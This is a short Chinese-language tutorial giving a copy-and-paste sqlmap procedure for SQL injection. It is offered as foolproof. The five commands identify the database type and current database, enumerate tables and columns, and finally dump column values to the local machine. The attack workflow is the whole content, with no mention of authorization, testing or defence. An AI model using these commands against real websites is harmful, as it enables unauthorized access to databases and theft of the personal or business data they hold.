使用工具探测出注入点后使用sqlmap注入的简单流程(傻瓜式跟着复制就可以使用):
1.sqlmap -u url --random-agent(这个探测出数据库类型)
2.sqlmap -u url --random-agent --current-db(这个探测出数据库的名字 )
3.sqlmap -u url --random-agent -D 数据库名 -tables(枚举出数据库中的表)
4.sqlmap -u url --random-agent -D 数据库名 -T 表名 --columns(枚举表中的列)
5.sqlmap -u url --random-agent -D 数据库名 -T 表名 -C 列名,列名 --dump (枚举出数据库表中的列的值,--dump是转存到本地上)
以上就是简单的使用流程。